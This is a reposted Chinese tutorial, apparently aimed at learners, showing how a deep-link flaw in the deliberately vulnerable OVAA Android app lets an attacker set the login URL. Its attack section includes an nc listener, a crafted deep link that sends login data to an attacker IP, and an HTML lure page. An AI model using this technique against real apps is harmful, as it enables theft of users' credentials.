结合Deep Link加载任意URL窃取目标APP用户凭证
慧生活
在正式开始漏洞利用之前,我们需要先来了解一下什么是deep link。
Deep Link简介
Deep Link 是一种允许应用程序通过 URL 直接响应特定页面或功能的技术。这是通过操作系统和应用程序之间的一种约定来实现的。
Deep Link 结构:
在 Android 中,当安装一个应用程序时,该应用程序的 manifest 文件(AndroidManifest.xml)会注册到系统中。这个文件包含了该应用程序的所有组件信息,包括 activities、services、broadcast receivers 等。对于 deep linking,开发者可以在 manifest 文件中定义一个或多个 intent filters,这些 intent filters 定义了哪些 URL 可以启动哪些 activities。
当用户点击一个符合某个应用程序 intent filter 规则的 URL 时,Android 系统就会启动该应用程序的对应 activity。具体的规则是通过 intent filter 中的 data 元素来定义的,这个元素可以指定 URL 的 scheme、host、path 等信息。如果 URL 符合这些规则,那么就会启动对应的 activity。
例如,下面这个示例:
通过分析上面的示例代码,我们就可以知道,在安卓系统中任何以"oversecured://ovaa"开头的URL都会启动其所对应的oversecured.ovaa.activities.DeeplinkActivity。
总的来说,深度链接允许开发者通过 URL 直接打开应用程序的特定部分,这对于用户体验和应用程序间的交互是非常有用的。
查找Deep Link
在Android系统中,应用需要在AndroidManifest.xml文件中声明它们能处理的Deep Link。因此,我们可以通过使用jadx等反编译工具对目标APK进行反编译,在反编译后的AndroidManifest.xml文件中搜索关键字:"android:scheme"
一般搜索结果所在的data标签部分,就包括了Deep Link Url所需的必要组成部分:
- scheme: oversecured,
- host: ovaa
转换成url就是:oversecured://ovaa
那这个时候,找到了APP可以处理的Deep Link,我们可以先来尝试一下,在安卓系统中触发访问我们找到的这个Deep Link:oversecured://ovaa。
1)在PC上使用python在本地开启一个简易的web服务器
python -m http.server
2)在本地服务器根目录放置一个html页面文件
html>
ad>
Deep Linking Test<span class="hljs-name"title>
<span class="hljs-name"head>
<body>
<h1>Deep Linking Test!<span class="hljs-name"h1>
<p><a href="oversecured://ovaa">点击这里可以打开指定的Deep Linking<span class="hljs-name"a><span class="hljs-name"p>
<span class="hljs-name"body>
<span class="hljs-name"html>
</code></pre>
<p>这个页面的主要目的就是,当在<u>手机</u>浏览器远程访问html页面时,点击a标签对应的超链接,就可以在安卓系统中触发对Deep Link的访问</p>
<p>3)在手机浏览器远程访问html页面,点击a标签对应的超链接</p>
<p><code>oversecured://ovaa</code>被访问时,<code>DeeplinkActivity</code>将会被瞬间打开然后立即关闭,我们可能只会看到一个闪烁的屏幕,看不到具体的Activity内容。</p>
<blockquote>
<p>❝通过分析DeeplinkActivity代码可以知道:直接访问<code>oversecured://ovaa</code>,Android系统将会匹配到<code>DeeplinkActivity</code>并启动它,因为目标APP的AndroidManifest.xml中定义的intent-filter声明了这个Activity可以处理scheme为"oversecured"和host为"ovaa"的URI。</p>
<p>在<code>DeeplinkActivity</code>的<code>onCreate</code>方法中,它会获取到传入的Intent,检查Intent的action是否为"android.intent.action.VIEW",然后获取并处理Intent的data(即URI)。因此,当直接访问<code>oversecured://ovaa</code>,这个Activity将会被启动,并且在<code>onCreate</code>方法中调用<code>processDeeplink</code>方法。</p>
<p>但是,因为我们直接访问的URI没有路径(path),所以在<code>processDeeplink</code>方法中,<code>uri.getPath()</code>将返回<code>null</code>,所有的条件分支都不会被执行,所以不会有任何额外的操作。</p>
<p>然后,<code>onCreate</code>方法会调用<code>finish()</code>方法来结束这个Activity。所以,从咱们的用户的视角来看,<code>oversecured://ovaa</code>被访问时,<code>DeeplinkActivity</code>将会被瞬间打开然后立即关闭,用户可能只会看到一个闪烁的屏幕,看不到具体的Activity内容。</p>
<p>❞</p>
</blockquote>
<h2>跟踪APP对Deep Link的处理</h2>
<p>通过分析目标APP的AndroidManifest.xml,我们知道响应oversecured://ovaa的Activity是oversecured.ovaa.activities.DeeplinkActivity,因此我们可以通过反编译工具查看DeeplinkActivity相关的代码。</p>
<pre><code >package oversecured.ovaa.activities;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;
import oversecured.ovaa.utils.LoginUtils;
/* loaded from: classes.dex */
public class DeeplinkActivity extends AppCompatActivity {
private static final int URI_GRANT_CODE = 1003;
private LoginUtils loginUtils;
/* JADX INFO: Access modifiers changed from: protected */
@Override // androidx.appcompat.app.AppCompatActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
public void onCreate(Bundle savedInstanceState) {
Uri uri;
super.onCreate(savedInstanceState);
this.loginUtils = LoginUtils.getInstance(this);
Intent intent = getIntent();
if (intent != null && "android.intent.action.VIEW".equals(intent.getAction()) && (uri = intent.getData()) != null) {
processDeeplink(uri);
}
finish();
}
private void processDeeplink(Uri uri) {
String url;
String host;
if ("oversecured".equals(uri.getScheme()) && "ovaa".equals(uri.getHost())) {
String path = uri.getPath();
if ("/logout".equals(path)) {
this.loginUtils.logout();
startActivity(new Intent(this, EntranceActivity.class));
} else if ("/login".equals(path)) {
String url2 = uri.getQueryPa<u>ram</u>eter("url");
if (url2 != null) {
this.loginUtils.setLoginUrl(url2);
}
startActivity(new Intent(this, EntranceActivity.class));
} else if ("/grant_uri_permissions".equals(path)) {
Intent i = new Intent("oversecured.ovaa.action.GRANT_PERMISSIONS");
if (getPackageManager().resolveActivity(i, 0) != null) {
startActivityForResult(i, 1003);
}
} else if ("/webview".equals(path) && (url = uri.getQueryParameter("url")) != null && (host = Uri.parse(url).getHost()) != null && host.endsWith("example.com")) {
Intent i2 = new Intent(this, WebViewActivity.class);
i2.putExtra("url", url);
startActivity(i2);
}
}
}
/* JADX INFO: Access modifiers changed from: protected */
@Override // androidx.fragment.app.FragmentActivity, android.app.Activity
public void onActivityResult(int requestCode, int resultCode, Intent data) {
super.onActivityResult(requestCode, resultCode, data);
if (resultCode == -1 && requestCode == 1003) {
setResult(resultCode, data);
}
}
}
</code></pre>
<p>通过分析代码,我们可以知道:</p>
<p>1)当用户点击一个匹配intent filter的deep link URL时,Android系统会启动对应的activity,并通过intent传递数据给这个activity,此处也就是DeeplinkActivity。当DeeplinkActivity被打开时,APP首先执行的是onCreate方法,开发者在activity的onCreate()方法中通过getIntent()获取这个intent,然后通过getData()获取URL</p>
<p>2)获取到URL后,APP再调用processDeeplink(uri),接着根据传入的uri进行一系列处理,主要是通过条件语句针对url中不同的path进行不同的逻辑处理,通过代码可知APP可识别处理的path是:/logout、/login、/grant_uri_permissions、/webview。</p>
<h3>跟踪APP对/login路径的处理</h3>
<p>比如当我们访问的deep link url是:oversecured://ovaa/login,代码String path = uri.getPath();得到的就是/login,此时当processDeeplink被调用时就会执行以下代码:</p>
<pre><code >else if ("/login".equals(path)) {
String url2 = uri.getQueryParameter("url");
if (url2 != null) {
this.loginUtils.setLoginUrl(url2);
}
startActivity(new Intent(this, EntranceActivity.class));
}
</code></pre>
<p>通过代码String url2 = uri.getQueryParameter("url");可知,APP会尝试从deep link中去获取一个名字叫做url的参数值。</p>
<p>比如我们访问的deep link url是:oversecured://ovaa/login?url=http://www.test.com。</p>
<p>如果我们访问的deeplink中有url参数,那APP取到url的值又要干嘛呢?我们继续跟踪</p>
<pre><code >if (url2 != null) {
this.loginUtils.setLoginUrl(url2);
}
</code></pre>
<p>如果APP取到url参数的值,则将取到的url继续传给setLoginUrl处理</p>
<pre><code >public void setLoginUrl(String url) {
this.editor.putString(LOGIN_URL_KEY, url).commit();
}
</code></pre>
<p>这段代码的含义就是调用 <code>SharedPreferences.Editor</code> 的 <code>putString</code> 方法,将键为 <code>LOGIN_URL_KEY</code> 的字符串值设为 <code>url</code>,然后调用 <code>commit</code> 方法将这个改动保存到 SharedPreferences 中。这样,下次应用程序启动时,这个 URL 仍然可以被获取到。</p>
<p>到这里,我们就比较清晰了,获取到deep link传递过来的url后,将url的值和LOGIN_URL_KEY这个键进行了绑定。就是一个获取并保存的操作,那我们继续接着往后面的代码进行分析:</p>
<p>当if语句执行结束,保存好了url后,APP又启动了一个新的界面EntranceActivity</p>
<pre><code >startActivity(new Intent(this, EntranceActivity.class));
</code></pre>
<p>我们继续最终分析EntranceActivity界面的代码</p>
<pre><code >public class EntranceActivity extends AppCompatActivity {
/* JADX INFO: Access modifiers changed from: protected */
@Override // androidx.appcompat.app.AppCompatActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
if (LoginUtils.getInstance(this).isLoggedIn()) {
startActivity(new Intent("oversecured.ovaa.action.ACTIVITY_MAIN"));
} else {
startActivity(new Intent("oversecured.ovaa.action.LOGIN"));
}
finish();
}
}
</code></pre>
<p>这个EntranceActivity的代码主要是判断当前是否已登录或者未登录,那我们这里继续追踪未登录的代码进行分析,也就是else代码块中的调用:</p>
<pre><code >startActivity(new Intent("oversecured.ovaa.action.LOGIN"));
</code></pre>
<p>在AndroidManifiest.xml文件中搜索“oversecured.ovaa.action.LOGIN”,可以看到对应的是oversecured.ovaa.activities.LoginActivity</p>
<p>image-20230519013229270</p>
<p>继续分析LoginActivity中处理登录的关键函数processLogin:</p>
<pre><code >public void processLogin(String em<u>ai</u>l, String password) {
LoginData loginData = new LoginData(email, password);
Log.d("ovaa", "Processing " + loginData);
LoginService loginService = (LoginService) RetrofitInstance.getInstance().create(LoginService.class);
loginService.login(this.loginUtils.getLoginUrl(), loginData).enqueue(new Callback<Void>() { // from class: oversecured.ovaa.activities.LoginActivity.2
@Override // retrofit2.Callback
public void onResponse(Call<Void> call, Response<Void> response) {
}
@Override // retrofit2.Callback
public void onFailure(Call<Void> call, Throwable t) {
}
});
this.loginUtils.saveCredentials(loginData);
onLoginFinished();
}
</code></pre>
<p>这段代码的主要作用就是处理用户的登录,是使用 Retrofit 库来与服务器进行<u>通信</u>。</p>
<pre><code >loginService.login(this.loginUtils.getLoginUrl(), loginData).enqueue(new Callback
</code></pre>
<p>这段代码主要就是调用 <code>loginService</code> 的 <code>login</code> 方法,传入登录 URL 和登录数据,登录url是从getLoginUrl函数获取,而这个函数最终拿到的登录url就是前面从deeplink中获取到的url。</p>
<pre><code >public String getLoginUrl() {
String url = this.preferences.getString(LOGIN_URL_KEY, null);
if (TextUtils.isEmpty(url)) {
String url2 = this.context.getString(R.string.login_url);
this.editor.putString(LOGIN_URL_KEY, url2).commit();
return url2;
}
return url;
}
</code></pre>
<p>那分析到这里,我们就可以知道,APP在处理oversecured://ovaa/login?url=http://www.test.com 这个deep link的时候,会将url的值作为登录url,然后将用户输入的账号和密码作为参数发起请求进行提交,但是此处的url是攻击者可控的,从而就导致了可窃取用户的登录凭证。</p>
<h2>凭证截取</h2>
<p>1)攻击者服务器监听端口,用于接收窃取到的账号密码。</p>
<pre><code >nc -lnvp 8889
</code></pre>
<p><img src="https://i0.sensorexpert.com.cn/article/20230521/wKgZomRoZFeAN2xoAABp5jKkOko830.jpeg"/></p>
<p>2)根据分析,构造恶意的deep link</p>
<p>oversecured://ovaa/login?url=http://192.168.10.11:8889</p>
<p>3)攻击者web服务器放置一个html页面,用于诱导用户点击执行deeplink</p>
<pre><code >html>
<html>
<head>
<meta charset="UTF-8">
<title>Deep Linking Test<span class="hljs-name"title>
<span class="hljs-name"head>
<body>
<h1>Deep Linking Test!<span class="hljs-name"h1>
<p><a href="oversecured://ovaa/login?url=http://192.168.10.11:8889">点击这里可以打开指定的Deep Linking<span class="hljs-name"a><span class="hljs-name"p>
<span class="hljs-name"body>
<span class="hljs-name"html>
</code></pre>
<p>4)最终窃取账号密码的效果</p>
<p><img src="https://i0.sensorexpert.com.cn/article/20230521/wKgaomRoZFeAasWRAALNIMW4nvU780.jpeg"/></p>
</p > <!--
<p></p > -->
</p > <div class="author-right">
</div>
</div>
</div>
<p class="see-more" id="seeMore"><span>查看全文<i class="iconfont icon-arrow-bottom-small"></i></span></p>
<!-- 点赞 -->
<div class="d_appose hide">
<div id="appose-btn">
<p><i class="iconfont icon-right-praise"></i></p>
<p class="tips">点赞</p>
</div>
</div>
</div>
<!-- 作者 -->
<div class="detail-intro">
<div class="am-cf">
<aside><a href="/home/22148" target="_self"><img src="https://i0.sensorexpert.com.cn/user/face/9fO7arIQKu.png?x-oss-process=style/c11120" alt="" onerror="this.src='/v3/images/user_default.png'"></a></aside>
<div>
<h3><a href="/home/22148" target="_self">慧生活</a></h3>
<p></p>
</div>
</div>
<!-- 去掉 -->
<div class="do-attention am-cf hide">
<button id='attention-btn' class="attention ">
<i class="iconfont icon-add"></i>关注 </button>
<button class="pri-message" data-am-modal="{target: '#my-message',closeViaDimmer: false}"><i class=""></i>私信</button>
</div>
</div>
<!-- 作者最近更新 -->
<div class="detail-middle">
<!-- 资料下载 -->
<!-- 作者最近更新 -->
<div class="detail-recent">
<p>作者最近更新</p>
<ul>
<li class="common_list_information">
<div class="textBox textAll">
<a href="/article/434045.html" rel="nofollow" ><div class="text">智慧管网新范式:凯米斯科技岸边站系统重塑城市污水运维体系</div></a>
<div class="textBox_b">
<a href="/home/22148">
<div class="itme">
<div class="img"><img src="https://i0.sensorexpert.com.cn/user/face/9fO7arIQKu.png?x-oss-process=style/c11120" class="lazy" data-original="https://i0.sensorexpert.com.cn/user/face/9fO7arIQKu.png?x-oss-process=style/c11120" onerror="this.src='/v3/images/default.png'" alt=""></div>
<span class="name">慧生活</span>
</div>
</a>
<div class="time">12小时前</div>
</div>
</div>
</li>
<li class="common_list_information">
<div class="textBox textAll">
<a href="/article/433924.html" rel="nofollow" ><div class="text">瑞之辰压力传感器,尺寸小可替代进口</div></a>
<div class="textBox_b">
<a href="/home/22148">
<div class="itme">
<div class="img"><img src="https://i0.sensorexpert.com.cn/user/face/9fO7arIQKu.png?x-oss-process=style/c11120" class="lazy" data-original="https://i0.sensorexpert.com.cn/user/face/9fO7arIQKu.png?x-oss-process=style/c11120" onerror="this.src='/v3/images/default.png'" alt=""></div>
<span class="name">慧生活</span>
</div>
</a>
<div class="time">2天前</div>
</div>
</div>
</li>
<li class="common_list_information">
<div class="textBox textAll">
<a href="/article/433922.html" rel="nofollow" ><div class="text">从空间建模到生命存在:高精度传感如何让机器“看懂”世界</div></a>
<div class="textBox_b">
<a href="/home/22148">
<div class="itme">
<div class="img"><img src="https://i0.sensorexpert.com.cn/user/face/9fO7arIQKu.png?x-oss-process=style/c11120" class="lazy" data-original="https://i0.sensorexpert.com.cn/user/face/9fO7arIQKu.png?x-oss-process=style/c11120" onerror="this.src='/v3/images/default.png'" alt=""></div>
<span class="name">慧生活</span>
</div>
</a>
<div class="time">2天前</div>
</div>
</div>
</li>
</ul>
</div>
<!-- 期刊订阅 -->
<div class="detail-email" id="do-email">
<h3>期刊订阅</h3>
<input type="text" placeholder="E-mail">
<button>订阅</button>
</div>
<!-- 相关推荐 -->
<div class="about-recommend">
<p>相关推荐</p>
<ul>
<li class="am-cf">
<div class=" ">
<h3><a href="/article/12.html" target="_self" rel="nofollow" >浅谈我国医疗智慧物联网应用现状及未来发展</a></h3>
<p class="am-cf">
<span>
<a href="/home/2">
<img src="https://i0.sensorexpert.com.cn/user/face/headimgurl/1-4.png?x-oss-process=style/c11120" alt="" onerror="this.src='/v3/images/default.png'">
</a>
</span>
<time class="am-fr">2018-12-03</time>
</p>
</div>
<aside class="am-fr">
<a href="/article/12.html" rel="nofollow" > <img src="https://i1.sensorexpert.com.cn/si/ff14588f9e364bcda92b2ff56d9b3f67.jpg?x-oss-process=style/c169300" alt="" onerror="this.src='/v3/images/default.png'"></a>
</aside>
</li>
<li class="am-cf">
<div class=" ">
<h3><a href="/article/45.html" target="_self" rel="nofollow" >从MEMS专利数量分析我国MEMS传感器产业现状</a></h3>
<p class="am-cf">
<span>
<a href="/home/2">
<img src="https://i0.sensorexpert.com.cn/user/face/headimgurl/1-4.png?x-oss-process=style/c11120" alt="" onerror="this.src='/v3/images/default.png'">
</a>
</span>
<time class="am-fr">2019-03-28</time>
</p>
</div>
<aside class="am-fr">
<a href="/article/45.html" rel="nofollow" > <img src="https://i1.sensorexpert.com.cn/ti/03a0ac8960814aca972010cc9f7b49e6.jpg?x-oss-process=style/c169300" alt="" onerror="this.src='/v3/images/default.png'"></a>
</aside>
</li>
<li class="am-cf">
<div class=" ">
<h3><a href="/article/144.html" target="_self" rel="nofollow" >诺基亚推出基于区块链的智慧城市传感系统</a></h3>
<p class="am-cf">
<span>
<a href="/home/2">
<img src="https://i0.sensorexpert.com.cn/user/face/headimgurl/1-4.png?x-oss-process=style/c11120" alt="" onerror="this.src='/v3/images/default.png'">
</a>
</span>
<time class="am-fr">2018-12-06</time>
</p>
</div>
<aside class="am-fr">
<a href="/article/144.html" rel="nofollow" > <img src="https://i1.sensorexpert.com.cn/si/ec7ab09c4cc943fbb870b4a57603c7d5.jpg?x-oss-process=style/c169300" alt="" onerror="this.src='/v3/images/default.png'"></a>
</aside>
</li>
<li class="am-cf">
<div class=" ">
<h3><a href="/article/163.html" target="_self" rel="nofollow" >北斗首次发布民用领域物联网无线数据模块产品</a></h3>
<p class="am-cf">
<span>
<a href="/home/2">
<img src="https://i0.sensorexpert.com.cn/user/face/headimgurl/1-4.png?x-oss-process=style/c11120" alt="" onerror="this.src='/v3/images/default.png'">
</a>
</span>
<time class="am-fr">2018-12-07</time>
</p>
</div>
<aside class="am-fr">
<a href="/article/163.html" rel="nofollow" > <img src="https://i1.sensorexpert.com.cn/si/e79e2d6ac43448cab587e36b9cf4ca06.jpg?x-oss-process=style/c169300" alt="" onerror="this.src='/v3/images/default.png'"></a>
</aside>
</li>
</ul>
</div>
</div>
<!-- 评论 -->
<p class="seperate hide"></p>
<div class="live-message hide">
<textarea id="" placeholder="我有话要说"></textarea>
<span class="count"></span>
<p> <button content_id="202814">提交评论</button></p>
</div>
<div class="detail-comment comment-detail hide" id="all-comment">
<p class="am-cf"><span>评论</span><span class="am-fr"><font id="total-comment" class="comment-count">0</font>条评论</span></p>
<ul class="all-comment">
</ul>
</div>
<div class="am-modal am-modal-no-btn am-modal-message-to" tabindex="-1" id="my-message">
<div class="am-modal-dialog">
<a href="javascript: void(0)" class="am-close am-close-spin" data-am-modal-close>×</a>
<div class="am-modal-hd">私信给<font id="user_name_primacy">慧生活</font></div>
<div class="am-modal-bd">
<div class="message-to">
<textarea id="msg"></textarea>
</div>
</div>
<div class="message-to-footer">
<button class="PRIVARY-btn" id="sendMsg">发送</button>
</div>
</div>
</div>
</main>
<div class="main_tip">
<div class="main_tip_content">
<a href="/jmpapp-index" target="_blank">
<div class="main_tip_co_icon"></div>
<p>点击打开传感搜小程序 - 速览海量产品,精准对接供需</p>
</a>
</div>
<div class="main_tip_close"><i class="iconfont icon-close"></i></div>
</div>
<div class="fixed-operate">
<ul class="am-cf">
<li id="btn-user-favorite" name="no">
<!-- <p><i class="iconfont icon-star-o"></i></p> -->
<p><i class="icon icon1"></i></p>
<p class="text">收藏</p>
</li>
<li attr="comment-all" class="hide">
<div class="comment-bottom" id="comment-botttom" style="display: none;">
<div class="am-cf">
<textarea></textarea>
<button class="am-fr" content_id="202814">发表</button>
</div>
</div>
<div id="toggle-comment">
<p><i class="iconfont icon-icon-message"></i></p>
<p>评论</p>
</div>
</li>
<li id="great-appose" >
<!-- <p><i class="iconfont icon-left-praise"></i></p> -->
<p><i class="icon icon2"></i></p>
<p class="tips">点赞</p>
</li>
<li onclick="sharetoweixin()">
<!-- <p><i class="iconfont icon-file"></i></p> -->
<p><i class="icon icon3"></i></p>
<p>分享</p></li>
</ul>
</div>
<!---收藏夹--->
<div id="modal-user-favorite" class="am-modal am-modal-no-btn detail-collect" tabindex="-1" id="shareTocollect" closeViaDimmer="0">
<div class="am-modal-dialog">
<div class='am-modal-hd'>收藏文章<a href="javascript: void(0)" class="am-close am-close-spin" data-am-modal-close="">×</a></div>
<div class="am-modal-bd">
<p class="inner">已选择<span id="chooseCount">0</span>个收藏夹</p>
<div class='collect-list'>
<div id="scrollArea-content">
<ul id='collectList'>
</ul>
</div>
<div class='add-collect'>
<a href="javascript:void(0);" id="add-favorite"><i class='iconfont icon-add'></i>新建收藏夹</a>
</div>
</div>
</div>
<a href="javascript:" class='am-btn am-btn-add' id="finish-collect">完成</a>
</div>
</div>
<div class="am-modal am-modal-confirm create_collect" tabindex="-1" id="modal-add-favorite">
<div class="am-modal-dialog">
<div class="am-modal-hd">
<span class="title">创建收藏夹</span>
<a href="javascript: void(0)" class="am-close am-close-spin" data-am-modal-close>×</a>
</div>
<div class="am-modal-bd">
<div class="content">
<input type="text" placeholder="收藏夹名称" id="favorite-title">
</div>
</div>
<div class="am-modal-footer">
<span class="am-modal-btn" data-am-modal-cancel>取消</span>
<span class="am-modal-btn" id="insert-favorite">保存</span>
</div>
</div>
</div>
<div>
</div>
<!--分享-->
<!---右上角朋友圈分享--->
<div class="am-modal am-modal-no-btn shareToWexin3" tabindex="-1" id="shareToWexin3" closeViaDimmer="0">
<div class='am-modal-dialog'>
<div>
<p>1.点击右上角</p>
<p>2.分享到“朋友圈”或“发送给好友”</p>
<i class='icon icon-share-modal'></i>
<button class='btn btn-know' type='button' data-am-modal-close>
我知道了
</button>
</div>
</div>
</div>
<!---微信朋友--->
<div class="am-modal am-modal-no-btn shareToWexin" tabindex="-1" id="shareToWexin">
<div class="am-modal-dialog">
<div class="am-modal-hd">
<a href="javascript: void(0)" class="am-close am-close-spin" data-am-modal-close>×</a>
</div>
<div class="am-modal-bd">
<div class='weixin-img' id="qrcode">
</div>
<img src="" alt="" class="img-weiDetail" style="display:none;margin: 0.64rem 1rem;width: 150px;height: 150px;">
<a id="download" download="qrcode.jpg" style="display: none"></a>
<!-- <p class='weixin-share-p'>长按二维码识别</p>-->
<p class='weixin-share-p'>微信扫一扫,分享到朋友圈</p>
<p class='weixin-share-use'>推荐使用浏览器内置分享功能</p>
</div>
</div>
</div>
<!--微信扫一扫-->
<div class="am-modal am-modal-no-btn shareWeixin4" tabindex="-1" id="shareToWexin4" closeViaDimmer="1">
<div class='am-modal-dialog'>
<div class='am-modal-hd'><a href="javascript: void(0)" class="am-close am-close-spin" data-am-modal-close="">×</a></div>
<div class="am-modal-bd">
<div class="modal-weixin">
<p>关注微信订阅号</p>
<div><div><img src="/v3/images/gongzonghao.png" alt=""></div>
</div><p>关注微信订阅号,了解更多传感器动态</p></div>
</div>
</div>
</div>
<!--评论模板-->
<div id="template-comment" style="display:none;">
<li ids="#{id}">
<aside><a href="#{user_url}" target="_blank">#{faceHtml}</a></aside>
<div class="right-content-li">
<p class="content-top-el am-cf"><span><a href="#{user_url}" target="_blank">#{user_name}</a></span><span class="am-fr">#{created_at}</span></p>
<p class="coment-content checkShowOrHide"><span>#{content}</span></p>
<p class="see-more btn-display">展开<i class="iconfont icon-arrow-bottom-small"></i></p>
<p class="do-operate">
<a href="javascript:" class="appose appose_#{is_like}" content_id="#{id}" is_like="#{is_like}"><font>#{like_count}</font><i class="iconfont icon-no-praise"></i></a>
<a href="javascript:" class="notAppose notAppose_#{is_dislike}" content_id="#{id}" is_like="#{is_dislike}"><font>#{dislike_count}</font><i class="iconfont icon-cancel-praise"></i></a>
<a href="javascript:" class="reback" total="#{comment_count}" content_id="#{id}" clickId="displayContent_#{id}">查看评论</a>
<a href="javascript:" content_id="#{id}" class="reply subReply" attr="reply_#{id}">回复</a>
</p>
</div>
<div id="reply_#{id}" class="inner-content am-cf" style="display: none;">
<div class="triangle_border_up" style="left: auto;right: 20%;">
</div>
<div class="rebackInput"><textarea placeholder="回复:#{user_name}"></textarea></div>
<p class="inner-content-operate am-fr">
<button class="cancel-reply" content_id="#{id}" attrid="#{id}">取消</button>
<button class="do-reply" content_id="#{id}" is_dialog="0" attrid="#{id}" reply_uid="#{user_id}">回复</button>
</p>
</div>
<div class="inner-content am-cf" id="displayContent_#{id}" style="display: none;">
<span class="total-comment">共<font class="comment-total">#{comment_count}</font>条评论</span>
<div class="triangle_border_up">
</div>
<ul class="commet-to">
</ul>
<div>
<p class="center subClick clickMore" content_id="#{id}" clickId="displayContent_#{id}" attr="1" id="re-reply_#{id}">
<span class="loadmore-two">
<a href="javascript:">加载更多</a><i class="iconfont icon-right"></i>
</span>
</p>
</div>
</div>
</li>
</div>
<div id="subContentTemplate" style="display:none;">
<li ids="#{id}">
<div>
<p class="content-top-el am-cf">#{ahtml}<span class="am-fr username-time">#{created_at}</span></p>
<p class="coment-content checkShowOrHide"><span>#{content}</span></p>
<p class="see-more btn-display">展开<i class="iconfont icon-arrow-bottom-small"></i></p>
<p class="do-operate">
<a href="javascript:" content_id="#{id}" class="appose appose_#{is_like}" is_like="#{is_like}"><font>#{like_count}</font><i class="iconfont icon-no-praise"></i></a>
<a href="javascript:" content_id="#{id}" class="notAppose notAppose_#{is_dislike}" is_like="#{is_dislike}"><font>#{dislike_count}</font><i class="iconfont icon-cancel-praise"></i></a>
#{reback}
<a href="javascript:" content_id="#{id}" reply_uid="#{user_id}" class="reply subReply" attrid="#{id}" attr="reply_#{id}">回复</a>
</p>
<div id="reply_#{id}" class="am-cf" style="display: none;">
<div class="rebackInput"><textarea placeholder="回复:#{user_name}"></textarea></div>
<p class="inner-content-operate am-fr">
<button href="javascript:;" class="cancel-reply" content_id="#{id}" attrid="#{id}">取消</button>
<button class="do-reply" content_id="#{target_id}" is_dialog="1" attrid="#{id}" reply_uid="#{user_id}">回复</button>
</p>
</div>
</div>
</li>
</div>
<div id="communicate-template" style="display:none;">
<li>
<div>
<p class="content-top-el am-cf"> #{ahtml}<span class="am-fr">#{created_at}</span></p>
<p class="coment-content checkShowOrHide"><span>#{content}</span></p>
<p class="see-more btn-display">展开<i class="iconfont icon-arrow-bottom-small"></i></p>
<p class="do-operate">
<a href="javascript:" content_id="#{id}" class="appose appose_#{is_like}" is_like="#{is_like}"><font>#{like_count}</font><i class="iconfont icon-no-praise"></i></a>
<a href="javascript:" content_id="#{id}" class="notAppose notAppose_#{is_dislike}" is_like="#{is_dislike}"><font>#{dislike_count}</font><i class="iconfont icon-cancel-praise"></i></a>
<a href="javascript:" content_id="#{id}" class="reply subReply" attr="reply_#{id}">回复</a>
</p>
<div id="reply_#{id}" class="am-cf" style="display: none;">
<div class="rebackInput"><textarea placeholder="回复:#{user_name}"></textarea></div>
<p class="inner-content-operate am-fr">
<button content_id="#{id}" attrid="#{id}" class="cancel-reply">取消</button>
<button class="do-reply" content_id="#{id}" is_dialog="1" attrid="#{id}" reply_uid='#{user_id}'>回复</button>
</p>
</div>
</div>
</li>
</div>
<!-- 广告-->
<div class="banner_content" style="display:none;" >
<div class="content_box">
<div class="cancelBox">
<div class="btn iconfont iconguanbi"></div>
<span>关闭</span>
</div>
<div class="slider_itme ads-box" name='M-ZXTK-A001'>
<div data-am-widget="slider" class="am-slider am-slider-a1" data-am-slider='{slideshow:true,directionNav:false}'>
<ul class="am-slides"></ul>
</div>
</div>
<div class="swiper-tip">广告</div>
</div>
</div>
<script>
var id = 202814;
var author_id =22148;
var like = 0;
var view_total = 365;
var attentions ='0';
</script>
<script src="/v3/js/public/require.js"></script>
<script>
requirejs(['/v3/js/require-control.js?'+(new Date()).getTime()], function () {
require(['news_detail'],function(){
require(['bodyShow']);
});
});
</script></div>
<!-- 页面加载 -->
<div class="mask-body" style="height: 100%;width: 100%;background-color: white;z-index: 111111;position: fixed;top: 0;">
<div id='mask-image' style="text-align: center;"> <img src="/v3/images/logo_m.png" alt="" style="width: 36%; max-width:272px; min-width:136px;"></div>
<div id='mask-image-bottom' style="width: 100%;text-align: center;position: absolute;bottom: 33px;"> <img src="/v3/images/logo_bottom.png" alt="" style="width: 35%; max-width: 266px; min-width:133px;"></div>
</div>
</body>
<script>
resizes();
window.addEventListener("onorientationchange" in window ? "orientationchange" : "resize", function() {
resizes();
}, false);
function resizes() {
var imagePosition = 0;
setTimeout(function () { //解决横竖屏
document.getElementsByTagName("body")[0].style.display ='block';
if (window.orientation == 180 || window.orientation == 0) {
// console.log(document.documentElement.clientHeight);
imagePosition = document.documentElement.clientHeight-100;
}
if (window.orientation == 90 || window.orientation == -90) {
imagePosition = document.documentElement.clientHeight-150;
}
document.getElementById('mask-image').setAttribute('style', 'text-align:center;margin-top:' + imagePosition / 2.5 + 'px');
},100);
}
</script>
</html>